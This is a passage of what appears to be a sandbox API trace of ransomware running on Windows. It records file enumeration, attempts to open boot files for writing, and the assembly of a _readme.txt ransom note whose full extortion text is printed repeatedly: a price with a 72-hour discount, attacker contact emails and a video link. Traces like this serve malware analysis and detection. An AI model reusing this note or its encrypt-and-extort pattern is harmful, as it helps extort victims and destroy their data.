wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.909] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.909] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.909] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.909] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.909] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.909] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.909] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.909] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.909] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.909] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.909] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.909] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.909] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.909] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.909] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.909] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.909] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.909] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0165.909] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.909] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.909] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.909] PathFindFileNameW (pszPath="") returned="" [0165.909] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.910] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.910] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.910] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.910] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.910] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.910] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.910] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0165.910] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0165.910] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.910] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.911] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.911] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.911] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0165.911] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.911] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.911] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.911] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.911] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.911] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned=".mui" [0165.911] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.911] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f60 | out: hHeap=0xcd0000) returned 1 [0165.911] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.911] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.912] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.912] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0165.912] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0165.912] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.912] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.912] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.912] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.912] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.912] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.912] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.912] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.912] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.912] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.912] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.912] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.912] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.912] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.913] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.913] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.913] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.913] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.913] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.913] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.913] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.913] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.913] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.913] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.913] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.913] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.913] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.913] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.913] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.913] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.914] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.914] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.915] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.915] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.915] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.915] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.915] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.915] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.915] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.915] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.915] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.915] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.915] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.915] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.915] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.915] RtlAllocateHeap 